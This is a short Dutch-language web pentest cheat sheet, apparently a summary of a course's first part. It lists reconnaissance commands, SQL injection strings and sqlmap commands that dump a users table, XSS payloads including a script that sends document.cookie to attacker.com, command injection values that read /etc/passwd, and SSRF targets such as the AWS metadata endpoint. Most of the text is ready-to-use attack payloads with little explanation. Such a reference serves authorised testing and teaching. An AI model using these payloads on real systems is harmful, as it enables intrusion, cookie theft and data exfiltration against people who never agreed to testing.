Web Pentest Cheat Sheet
De meest gebruikte commando's en payloads uit Deel I, op een rij.
Verkenning
nmap -sC -sV -oN scan.txt target.com
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt
nikto -h https://target.comSQL Injection
# Detectie
' OR 1=1--
' UNION SELECT NULL,NULL--
# SQLMap
sqlmap -u "https://target.com/page?id=1" --dbs
sqlmap -u "https://target.com/page?id=1" -D dbname --tables
sqlmap -u "https://target.com/page?id=1" -D dbname -T users --dumpXSS
// Reflective test
<script>alert(document.domain)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
// Cookie stealing
<script>fetch('https://attacker.com/?c='+document.cookie)</script>Command Injection
; whoami
| cat /etc/passwd
$(id)
`id`SSRF
# AWS metadata
http://169.254.169.254/latest/meta-data/
# Internal services
http://127.0.0.1:8080/admin
http://localhost:6379/Handige Burp Suite tips
Intercept > Forward/Drop per request
Repeater: Ctrl+R vanuit Proxy history
Intruder: Sniper voor single parameter fuzzing
Decoder: Smart decode voor multi-layer encoding